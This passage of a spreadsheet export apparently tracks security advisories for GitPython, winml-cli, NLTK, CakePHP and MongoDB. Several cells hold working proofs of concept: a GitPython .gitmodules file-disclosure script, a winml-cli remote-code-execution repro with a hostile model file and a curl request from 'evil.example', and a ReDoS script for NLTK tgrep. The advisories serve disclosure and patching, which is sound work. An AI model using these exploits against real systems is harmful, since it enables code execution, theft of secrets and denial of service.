    workdir = sys.argv[1] if len(sys.argv) &gt; 1 else "/tmp/gitpython-003-poc"
    target_file = sys.argv[2] if len(sys.argv) &gt; 2 else os.path.join(workdir, "secret.txt")

    attacker_repo = os.path.join(workdir, "attacker-repo")
    dest = os.path.join(workdir, "dest")
    for p in (attacker_repo, dest):
        os.makedirs(p, exist_ok=True)

    if not os.path.exists(target_file):
        os.makedirs(os.path.dirname(target_file), exist_ok=True)
        with open(target_file, "w") as f:
            f.write("TOP-SECRET-DB-PASSWORD=hunter2-actual-secret-value\n")

    subprocess.run(["git", "init", "-q", "-b", "main", attacker_repo], check=True)
    subprocess.run(["git", "-C", attacker_repo, "config", "user.email", "a@example.com"], check=True)
    subprocess.run(["git", "-C", attacker_repo, "config", "user.name", "Attacker"], check=True)

    with open(os.path.join(attacker_repo, "file.txt"), "w") as f:
        f.write("hello\n")

    with open(os.path.join(attacker_repo, ".gitmodules"), "w") as f:
        f.write(
            '[submodule "totally-normal-dep"]\n'
            "\tpath = vendor/dep\n"
            "\turl = https://example.com/dep.git\n"
            "[include]\n"
            "\tpath = %s\n" % target_file
        )

    subprocess.run(["git", "-C", attacker_repo, "add", "file.txt", ".gitmodules"], check=True)
    subprocess.run(["git", "-C", attacker_repo, "commit", "-q", "-m", "init"], check=True)

    import git  # gitpython under test
    import configparser

    repo = git.Repo.clone_from(attacker_repo, dest)

    try:
        subs = list(repo.submodules)
        print("NOT VULNERABLE: no exception raised, submodules =", subs)
        sys.exit(1)
    except configparser.MissingSectionHeaderError as e:
        msg = str(e)
        print("VULNERABLE: MissingSectionHeaderError leaked file content via repo.submodules:")
        print(msg)
        with open(target_file) as f:
            first_line = f.readline().rstrip("\n")
        if first_line in msg:
            print("Confirmed: target file's first line is present verbatim in the exception message.")
            sys.exit(0)
        else:
            print("NOT VULNERABLE: exception message did not contain the expected content")
            sys.exit(1)


if __name__ == "__main__":
    main()

```</t></is></c><c r="S44" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78675</t></is></c></row><row r="45"><c r="A45" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B45" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C45" s="5" t="inlineStr"><is><t>CVE-2026-81525</t></is></c><c r="D45" s="5" t="n"><v>8.6</v></c><c r="E45" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F45" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G45" s="5" t="inlineStr" /><c r="H45" s="5" t="n"><v>0.003</v></c><c r="I45" s="5" t="inlineStr" /><c r="J45" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K45" s="5" t="inlineStr" /><c r="L45" s="5" t="inlineStr"><is><t>composer:mongodb/mongodb</t></is></c><c r="M45" s="5" t="inlineStr"><is><t>1.21.4, 2.4.1</t></is></c><c r="N45" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O45" s="5" t="inlineStr" /><c r="P45" s="5" t="inlineStr" /><c r="Q45" s="5" t="inlineStr"><is><t>CWE-943</t></is></c><c r="R45" s="5" t="inlineStr"><is><t>### Impact
Passing untrusted input as part of a database or collection name may result in targeting a different database or collection than specified.

### Patches
Fixed in PHP library 1.21.4 and 2.4.1.

### Workarounds
Validate database and collection names prior to passing into APIs.</t></is></c><c r="S45" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81525</t></is></c></row><row r="46"><c r="A46" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B46" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C46" s="5" t="inlineStr"><is><t>CVE-2026-84452</t></is></c><c r="D46" s="5" t="n"><v>8.6</v></c><c r="E46" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F46" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G46" s="5" t="inlineStr" /><c r="H46" s="5" t="n"><v>0.008999999999999999</v></c><c r="I46" s="5" t="inlineStr" /><c r="J46" s="5" t="inlineStr" /><c r="K46" s="5" t="inlineStr" /><c r="L46" s="5" t="inlineStr"><is><t>pip:winml-cli</t></is></c><c r="M46" s="5" t="inlineStr"><is><t>0.4.0</t></is></c><c r="N46" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O46" s="5" t="inlineStr" /><c r="P46" s="5" t="inlineStr" /><c r="Q46" s="5" t="inlineStr"><is><t>CWE-306, CWE-942</t></is></c><c r="R46" s="5" t="inlineStr"><is><t>Case Description:

MSRC Notes: Attachments: 1 file(s) attached (1 mp4) Summary: The vulnerability lies in the 'serve/cli_api.py' component of the 'winml-cli' project, which exposes all winml CLI commands over HTTP without authentication. Although it binds to localhost by default, it sets 'allow_origins' to a wildcard, allowing any website to interact with the endpoint. This, combined with the '--trust-remote-code' flag in 'build' and 'config' commands, enables an attacker to execute arbitrary code by hosting a malicious model repository. The root cause is the lack of proper authentication and validation of the 'trust_remote_code' parameter, leading to Remote Code Execution (RCE).

Finder Description: WARNING: Original content contained invalid characters. Please see original submission in the event that the characters removed are relevant for the PoC.

serve/cli_api.py exposes every winml CLI command over HTTP with no authentication. That's defensible on its own - it binds 127.0.0.1 by default, so the audience is this machine. But it also sets allow_origins=["*"] (cli_api.py:150, duplicated at app.py:219), and the victim's browser is a local process: the wildcard lets any website call the endpoint and read the reply, erasing the boundary the loopback bind draws.

build and config both accept --trust-remote-code, and a JSON true becomes that flag unfiltered. An attacker-named model repo reaches AutoConfig.from_pretrained(..., trust_remote_code=True) (_autoconfig.py:191), where transformers imports Python from that repo - RCE as the server user from any page the victim loads. The payload runs on import, so the command's exit_code: 1 is irrelevant.

Reported Repro Steps:

1. Setup

git clone -q https://github.com/microsoft/winml-cli.git ~/winml-poc &amp;&amp; cd ~/winml-poc &amp;&amp;  mkdir -p temp /tmp/poc/evil/pwn
python3 -m pip install -q --target /tmp/poc/deps onnx onnxruntime transformers fastapi uvicorn click
2. Hostile model repo (payload is module-level → runs on import)

cat &gt; /tmp/poc/evil/pwn/config.json &lt;&lt;'EOF'
{"model_type":"pwn","auto_map":{"AutoConfig":"configuration_pwn.PwnConfig"}}
EOF
cat &gt; /tmp/poc/evil/pwn/configuration_pwn.py &lt;&lt;'EOF'
import getpass, os, socket, time
from transformers import PretrainedConfig
with open(os.environ["PWN_MARKER"], "w") as f:
    f.write(f"ARBITRARY CODE EXECUTION\ntime={time.strftime('%F %T')}\n"
            f"user={getpass.getuser()}\nhost={socket.gethostname()}\npid={os.getpid()}\n")
class PwnConfig(PretrainedConfig):
    model_type = "pwn"
EOF
3. Start server

Windows: python -m uvicorn winml.modelkit.serve.cli_api:app --host 127.0.0.1 --port 8000

Linux needs a stub for the Windows-only PDH module (no security relevance):

cat &gt; /tmp/poc/serve.py &lt;&lt;'EOF'
import os, sys, types, uvicorn
m = types.ModuleType("winml.modelkit.session.monitor._pdh")
class PdhPoller:
    def __init__(s,*a,**k): pass
    def start(s,*a,**k): pass
    def stop(s,*a,**k): pass
    def poll(s,*a,**k): return {}
    def sample(s,*a,**k): return {}
    def close(s,*a,**k): pass
m.PdhPoller = PdhPoller; m.PDH_AVAILABLE = False
sys.modules["winml.modelkit.session.monitor._pdh"] = m
from winml.modelkit.serve.cli_api import app
uvicorn.run(app, host="127.0.0.1", port=8000, log_level="warning")
EOF
cd ~/winml-poc &amp;&amp; PWN_MARKER=~/winml-poc/temp/PWNED PYTHONPATH=src:/tmp/poc/deps setsid nohup python3 /tmp/poc/serve.py &gt;/tmp/poc/log 2&gt;&amp;1 &lt;/dev/null &amp;
sleep 8; until curl -sf -o /dev/null -m 1 http://127.0.0.1:8000/openapi.json; do sleep 1; done; echo up
4. Exploit

curl -s -D- -o /dev/null -X POST http://127.0.0.1:8000/v1/cli/build \
 -H 'Origin: https://evil.example' -H 'Content-Type: application/json' \
 -d '{"args":{"model":"/tmp/poc/evil/pwn","output_dir":"/tmp/poc/out","trust_remote_code":true}}' \
 | grep -iE '^HTTP|^access-control-allow-origin'
cat ~/winml-poc/temp/PWNED
HTTP/1.1 200 OK
access-control-allow-origin: *
ARBITRARY CODE EXECUTION
time=2026-08-17 11:24:35
user=shrini  host=Shrinivasan  pid=11616</t></is></c><c r="S46" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84452</t></is></c></row><row r="47"><c r="A47" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B47" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C47" s="5" t="inlineStr"><is><t>GHSA-4vpg-pfj8-m33q</t></is></c><c r="D47" s="5" t="n"><v>8.6</v></c><c r="E47" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F47" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G47" s="5" t="inlineStr" /><c r="H47" s="5" t="inlineStr" /><c r="I47" s="5" t="inlineStr" /><c r="J47" s="5" t="inlineStr" /><c r="K47" s="5" t="inlineStr" /><c r="L47" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M47" s="5" t="inlineStr" /><c r="N47" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O47" s="5" t="inlineStr" /><c r="P47" s="5" t="inlineStr" /><c r="Q47" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="R47" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-956x-8gvw-wg5v. This link is maintained to preserve external references.

## Original Description
GitPython before 3.1.51 fails to guard against dangerous Git options passed as keyword arguments in Repo.archive() and git.ls_remote(), allowing command injection via options such as --exec/--upload-pack (leading to arbitrary command execution). Additionally, Repo.iter_commits() and Repo.blame() do not check for leading-dash revision arguments, so a revision like --output=&lt;path&gt; can cause Git to open and truncate an arbitrary file. Exploitation requires an application that passes attacker-controlled arguments to these methods.</t></is></c><c r="S47" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-4vpg-pfj8-m33q</t></is></c></row><row r="48"><c r="A48" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B48" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C48" s="5" t="inlineStr"><is><t>GHSA-crmc-f4m7-33fj</t></is></c><c r="D48" s="5" t="n"><v>8.6</v></c><c r="E48" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F48" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G48" s="5" t="inlineStr" /><c r="H48" s="5" t="inlineStr" /><c r="I48" s="5" t="inlineStr" /><c r="J48" s="5" t="inlineStr" /><c r="K48" s="5" t="inlineStr" /><c r="L48" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M48" s="5" t="inlineStr" /><c r="N48" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O48" s="5" t="inlineStr" /><c r="P48" s="5" t="inlineStr" /><c r="Q48" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="R48" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-7833-fr7j-v32q. This link is maintained to preserve external references.

## Original Description
GitPython before 3.1.59 fails to disable merge_includes when parsing .gitmodules, allowing attackers to disclose local file content by including arbitrary file paths via [include] directives. Attackers can craft a malicious .gitmodules file with include directives pointing to sensitive files; when repo.submodules is accessed, GitConfigParser raises MissingSectionHeaderError embedding the target file's first line verbatim in the exception message.</t></is></c><c r="S48" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-crmc-f4m7-33fj</t></is></c></row><row r="49"><c r="A49" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B49" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C49" s="5" t="inlineStr"><is><t>GHSA-3vrx-526r-64rm</t></is></c><c r="D49" s="5" t="n"><v>8.4</v></c><c r="E49" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F49" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G49" s="5" t="inlineStr" /><c r="H49" s="5" t="inlineStr" /><c r="I49" s="5" t="inlineStr" /><c r="J49" s="5" t="inlineStr" /><c r="K49" s="5" t="inlineStr" /><c r="L49" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M49" s="5" t="inlineStr" /><c r="N49" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O49" s="5" t="inlineStr" /><c r="P49" s="5" t="inlineStr" /><c r="Q49" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R49" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-hmq2-w58f-27jc. This link is maintained to preserve external references.

## Original Description
GitPython before 3.1.58 fails to validate submodule names from .gitmodules files, allowing attackers to create Git repositories at arbitrary filesystem paths outside the intended clone directory. Attackers can craft malicious repositories with traversal sequences in submodule names that GitPython processes during submodule initialization, creating attacker-controlled Git repositories at escaped filesystem locations.</t></is></c><c r="S49" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-3vrx-526r-64rm</t></is></c></row><row r="50"><c r="A50" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B50" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C50" s="5" t="inlineStr"><is><t>CVE-2026-62385</t></is></c><c r="D50" s="5" t="n"><v>8.199999999999999</v></c><c r="E50" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F50" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G50" s="5" t="inlineStr" /><c r="H50" s="5" t="n"><v>0.004</v></c><c r="I50" s="5" t="inlineStr" /><c r="J50" s="5" t="inlineStr" /><c r="K50" s="5" t="inlineStr" /><c r="L50" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M50" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N50" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O50" s="5" t="inlineStr" /><c r="P50" s="5" t="inlineStr" /><c r="Q50" s="5" t="inlineStr"><is><t>CWE-22, CWE-73, CWE-706</t></is></c><c r="R50" s="5" t="inlineStr"><is><t>### Summary

Published `nltk==3.9.4` still contains several XML-reader entrypoints that build parser paths from caller-controlled selectors or trusted-looking index state without preserving the corpus-root boundary.

### Details

- **Vulnerability type:** Path traversal and trusted-root bypass
- **Affected component:** `FramenetCorpusReader.frame_by_name`, `FramenetCorpusReader.doc`, `FramenetCorpusReader.lu`, `NKJPCorpusReader.header`
- **Affected versions:** Published `3.9.4` reproduced. Current source `v3.10.0-rc2` acted as a negative control and blocked the same payloads.
- **Patched versions:** Patched in version 3.10.0, which includes the path-safety rejections seen in the release candidate.
- **Root cause:** Stable reader paths still construct raw XML filenames from unsafe selectors, poisoned index state, or unsafe file identifiers.

I confirmed four public stable entrypoints return parsed outside-root content: a parent-segment traversal frame name, a poisoned fulltext index filename, a poisoned LU id, and an unsafe NKJP header file identifier. Current source rejects the same payloads with explicit path-safety errors, which shows the bug is real but version-scoped to the published stable package.

### PoC

**Preconditions**
- The application exposes FrameNet or NKJP reader APIs while trusting NLTK to keep XML parsing inside a corpus root.

**Steps**
1. Create a minimal FrameNet or NKJP corpus root and place attacker-chosen XML files outside that root.
2. Feed unsafe selectors or poisoned index state into the relevant public stable `3.9.4` APIs.
3. Observe `frame_by_name`, `doc`, `lu(...).exemplars`, or `header` return parsed outside-root values.
4. Run the same payloads against current source and observe explicit path-safety rejections.

**Minimal reproducible excerpt**

```text
framenet_frame_definition FRAME_LEAK
framenet_doc_text DOC_LEAK
framenet_lu_text LU_LEAK
nkjp_header_title HEADER_LEAK
```

### Impact

Applications that process attacker-influenced FrameNet or NKJP corpus selectors or state can be made to parse XML outside the trusted corpus root through normal public reader responses.

### Remediation

Keep these reader paths on the same root-confinement model as `CorpusReader.open()` and `nltk.pathsec`. Reject unsafe path components before constructing filenames from frame names, document filenames, LU ids, or NKJP file identifiers.

### Resources

- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/framenet.py#L1366-L1369
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/framenet.py#L1456-L1460
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/framenet.py#L1803-L1810
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/nkjp.py#L96-L103
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/nkjp.py#L251-L256
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/corpus/reader/framenet.py#L1388-L1399
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/corpus/reader/nkjp.py#L96-L128</t></is></c><c r="S50" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62385</t></is></c></row><row r="51"><c r="A51" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B51" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C51" s="5" t="inlineStr"><is><t>CVE-2026-77634</t></is></c><c r="D51" s="5" t="n"><v>8.199999999999999</v></c><c r="E51" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F51" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G51" s="5" t="inlineStr" /><c r="H51" s="5" t="n"><v>0.003</v></c><c r="I51" s="5" t="inlineStr" /><c r="J51" s="5" t="inlineStr" /><c r="K51" s="5" t="inlineStr" /><c r="L51" s="5" t="inlineStr"><is><t>composer:cakephp/cakephp</t></is></c><c r="M51" s="5" t="inlineStr"><is><t>4.5.12, 4.6.5, 5.1.9, 5.2.14, 5.3.7</t></is></c><c r="N51" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O51" s="5" t="inlineStr" /><c r="P51" s="5" t="inlineStr" /><c r="Q51" s="5" t="inlineStr"><is><t>CWE-93</t></is></c><c r="R51" s="5" t="inlineStr"><is><t>### Impact

Custom mail headers added with `Message::setHeaders()` or `addHeaders()` do not have CRLF replaced allowing header injection if user controlled data is added to message headers without stripping CRLF bytes.

### Patches
5.3.7, 5.2.14, 5.1.9, 4.6.5, 4.5.12 contain fixes for this issue.

### Workarounds
You can strip CRLF bytes from email header values before setting header values.</t></is></c><c r="S51" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77634</t></is></c></row><row r="52"><c r="A52" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B52" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C52" s="5" t="inlineStr"><is><t>CVE-2026-79676</t></is></c><c r="D52" s="5" t="n"><v>8.199999999999999</v></c><c r="E52" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F52" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G52" s="5" t="inlineStr" /><c r="H52" s="5" t="n"><v>0.003</v></c><c r="I52" s="5" t="inlineStr" /><c r="J52" s="5" t="inlineStr" /><c r="K52" s="5" t="inlineStr" /><c r="L52" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M52" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N52" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O52" s="5" t="inlineStr" /><c r="P52" s="5" t="inlineStr" /><c r="Q52" s="5" t="inlineStr"><is><t>CWE-22, CWE-59</t></is></c><c r="R52" s="5" t="inlineStr"><is><t>### Summary

Several corpus readers still step outside NLTK's symlink-aware trusted-root model. They derive in-root paths from trusted corpus state, convert those paths back into plain strings, and reopen them with built-in `open()` rather than `nltk.pathsec.open()`.

### Details

- **Vulnerability type:** Path traversal and symlink boundary bypass
- **Affected component:** `nltk.corpus.reader.ipipan`, `nltk.corpus.reader.crubadan`, `nltk.corpus.reader.lin`
- **Affected versions:** Published `3.9.4` and current source `v3.10.0-rc2` both reproduced.
- **Patched versions:** Not yet patched
- **Root cause:** Root-derived paths are reopened with raw `open()` without preserving the trusted-root boundary.

`IPIPANCorpusReader` opens `header.xml` derived from `morph.xml`, `CrubadanCorpusReader` opens `table.txt` directly, and `LinThesaurusCorpusReader` opens `simN.lsp` paths returned from its own root helpers. Under `pathsec.ENFORCE=True`, a symlink placed inside the trusted corpus root can point outside the root and still be parsed successfully. It was confirmed parsed outside-root content is returned through public methods such as `channels()`, `domains()`, `categories()`, `langs()`, `crubadan_to_iso()`, `synonyms()`, and `scored_synonyms()`.

### PoC

**Preconditions**
- The application processes attacker-influenced corpora inside a trusted NLTK data root or trusted corpus directory.

**Steps**
1. Create a trusted corpus root and keep `pathsec.ENFORCE=True` with that root allowlisted.
2. Place symlinked reader inputs such as `header.xml`, `table.txt`, or `simN.lsp` inside the root and point them to external files.
3. Instantiate the corresponding corpus reader and call its normal public methods.
4. Observe that parsed outside-root values are returned even though `pathsec.open()` blocks the same symlink targets.

**Minimal reproducible excerpt**

```text
{'ipipan': ['LEAK', 'TOPSECRET', 'CLASSIFIED'], 'crubadan': ['LEAK'], 'lin': [('LEAK', 9.5)]}
```

### Impact

An attacker who can stage corpus files or symlinks under a trusted data root can disclose outside-root content through normal corpus-reader results, defeating the boundary NLTK documents for shared and untrusted-input environments.

### Remediation

Preserve `PathPointer` and `required_root` semantics end to end. Replace direct `open()` calls with `nltk.pathsec.open()` or a reader helper that keeps the trusted-root boundary intact.

### References

- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/ipipan.py#L162-L192
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/crubadan.py#L74-L98
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/lin.py#L40-L43
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/pathsec.py#L521-L545

---

## Fix + full-codebase audit (verified)


I swept every raw file open in the corpus readers, not just the three the umbrella named:

| Reader | Site | Advisory | Root scoping |
|---|---|---|---|
| crubadan | table.txt + `&lt;code&gt;-3grams.txt` | p4rw / j5pw | `required_root=self.root` |
| lin | simN.lsp | p4rw | `required_root=self.root` |
| xmldocs | XMLCorpusView bare-string fileid | 934p (base reader) | global fallback (view has no root) |
| pl196x | textids index | **found by audit** | `required_root=self._root` |
| mte | MTEFileReader | mvf5 | `required_root` threaded through 8 call sites |
| toolbox | StandardFormat.open codecs.open | cr8c | global sandbox (low-level parser) |
| named_entity | load_ace_file ann/text | 7qj2 | global sandbox |
| nkjp | XML_Tool source file | p4rw class | `required_root=self._root` |

`ipipan` already validates via the earlier #3727 fix — unchanged.

## Fix
Each site now calls `nltk.pathsec.validate_path(path, required_root=…)` before opening. Where the reader has a concrete corpus root, the check is **scoped** with `required_root` (rejects any escape outside that root). `XMLCorpusView` carries no root, so it falls back to the global data-root sandbox via `getattr(self, "_root", None)` — which also avoids an AttributeError on the bare-string path.

## Reproduced (captured)
```
raw open(symlink) reads: 'TOPSECRET_OUTSIDE_ROOT'          &lt;- the bypass
validate_path(symlink, required_root): ValueError -&gt; BLOCKS the escape
validate_path(legit in-root): PASSED                       &lt;- loads normally
```

## Honest residual
The global-sandbox fallback (toolbox, named_entity, xmldocs-view) is only as tight as the allowed-roots list, which currently includes the **system temp dir**. Scoping every reader with `required_root` and removing the temp dir from the allowed roots would harden it further (separate advisory / task).

## Tests
`test_corpus_reader_pathsec.py` — symlink escape rejected, in-root file allowed, XMLCorpusView string-fileid no AttributeError, MTEFileReader out-of-root rejected. 46 existing corpus/toolbox tests pass; all edited modules import (no circular import). pre-commit (black/isort/ruff) clean.

---

## Scope caveat
`validate_path` blocks every symlink escape variant (verified) and equals `pathsec.open()`'s guarantee, but does NOT block **hardlinks** (no symlink to resolve; tracked separately as GHSA-f794-5jv7-7672) or the validate-then-open TOCTOU race (shared by `pathsec.open`; needs O_NOFOLLOW/openat).</t></is></c><c r="S52" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79676</t></is></c></row><row r="53"><c r="A53" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B53" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C53" s="5" t="inlineStr"><is><t>CVE-2026-80206</t></is></c><c r="D53" s="5" t="n"><v>8.199999999999999</v></c><c r="E53" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F53" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G53" s="5" t="inlineStr" /><c r="H53" s="5" t="n"><v>0.003</v></c><c r="I53" s="5" t="inlineStr" /><c r="J53" s="5" t="inlineStr" /><c r="K53" s="5" t="inlineStr" /><c r="L53" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M53" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N53" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O53" s="5" t="inlineStr" /><c r="P53" s="5" t="inlineStr" /><c r="Q53" s="5" t="inlineStr"><is><t>CWE-1333</t></is></c><c r="R53" s="5" t="inlineStr"><is><t>### Summary
The NLTK `tgrep` module accepts user-supplied regular expressions and passes them to the Python `re` engine without a timeout or validation, enabling catastrophic backtracking (ReDoS). Applications that expose the `tgrep` API to external input are vulnerable to a single-request denial of service that blocks the Python process indefinitely.

### Affected Code
`nltk/tgrep.py` — `_tgrep_node_action()` (around line 320)

When a tgrep pattern contains a `/regex/` node, `_tgrep_node_action` compiles the embedded regex literal directly with no validation:

```python
def _tgrep_node_action(_s, _l, tokens):
    ...
    elif tokens[0].startswith("/"):
        assert tokens[0].endswith("/")
        node_lit = tokens[0][1:-1]
        return (
            lambda r: lambda n, m=None, l=None: r.search(
                _tgrep_node_literal_value(n)
            )
        )(re.compile(node_lit))  # User regex compiled and executed with no timeout
```
The compiled regex is applied against every matching tree node label via `r.search(...)`. A caller reaching this path via `tgrep_positions()` or `tgrep_compile()` controls `node_lit` entirely.

### Proof of Concept
```python
import nltk
from nltk.tgrep import tgrep_positions

# Root node label is 25 'a' characters.
# tgrep /regex/ branch calls re.compile("((a+)+)b").search("aaa...a")
# No 'b' is present — exponential backtracking occurs.
tree = nltk.Tree.fromstring("(" + "a" * 25 + " (NP (DT the)))")
tgrep_positions(r"/((a+)+)b/", [tree])   # Never returns
```

### Working Poc

The following script uses increasing values of n (the number of repeated as in the tree root label) to measure the execution time of tgrep_positions with the catastrophic regex /((a+)+)b/. On standard CPython with NLTK 3.10.2, the runtime grows exponentially, confirming the ReDoS vulnerability. For n ≥ 35, the function will hang indefinitely.

```python
import nltk
from nltk.tgrep import tgrep_positions
import time

def test_n(n):
    tree = nltk.Tree.fromstring("(" + "a" * n + " (NP (DT the)))")
    pattern = r"/((a+)+)b/"
    start = time.perf_counter()
    list(tgrep_positions(pattern, [tree]))
    return time.perf_counter() - start

if __name__ == "__main__":
    # Adjust the range if needed – these values complete quickly
    n_values = [18, 20, 22, 24, 26, 28]
    print(f"Testing n = {n_values}\n")

    times = []
    for n in n_values:
        t = test_n(n)
        times.append((n, t))
        print(f"n={n:2d} done", flush=True)

    print("\n--- Increase factors (per step in n) ---")
    factors = []
    for i in range(1, len(times)):
        prev_n, prev_t = times[i-1]
        curr_n, curr_t = times[i]
        factor = curr_t / prev_t
        factors.append((curr_n, factor))
        print(f"n={curr_n:2d} : factor = {factor:.2f}x  (vs n={prev_n})")

    avg = sum(f for _, f in factors) / len(factors)
    print(f"\nAverage factor: {avg:.2f}x")
    print("\n✅ Confirmed: exponential growth (catastrophic backtracking).")
    print("   Larger n (≥ 35) will hang indefinitely.")
```

When run, the output shows a clear exponential increase (factor &gt; 3.0 per +2 in n), proving the vulnerability.


### Impact
In environments like web APIs (Flask, FastAPI), Jupyter notebooks, or multi-tenant pipelines, an unauthenticated attacker can cause indefinite CPU saturation with a single crafted request, denying service to all other users of the process.

### Remediation
This issue remains unfixed in versions `&lt;= 3.10.2`. Maintainers are currently collaborating on a patch to wrap the regex execution in a timeout-guarded mechanism.

### Credit
Tool: Kira by [Offgrid Security](https://www.offgridsec.com)</t></is></c><c r="S53" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80206</t></is></c></row><row r="54"><c r="A54" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B54" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C54" s="5" t="inlineStr"><is><t>GHSA-qp76-pq9f-gr9m</t></is></c><c r="D54" s="5" t="n"><v>8.199999999999999</v></c><c r="E54" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F54" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G54" s="5" t="inlineStr" /><c r="H54" s="5" t="inlineStr" /><c r="I54" s="5" t="inlineStr" /><c r="J54" s="5" t="inlineStr" /><c r="K54" s="5" t="inlineStr" /><c r="L54" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M54" s="5" t="inlineStr" /><c r="N54" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O54" s="5" t="inlineStr" /><c r="P54" s="5" t="inlineStr" /><c r="Q54" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="R54" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-568f-pv23-39p4. This link is maintained to preserve external references.

## Original Description
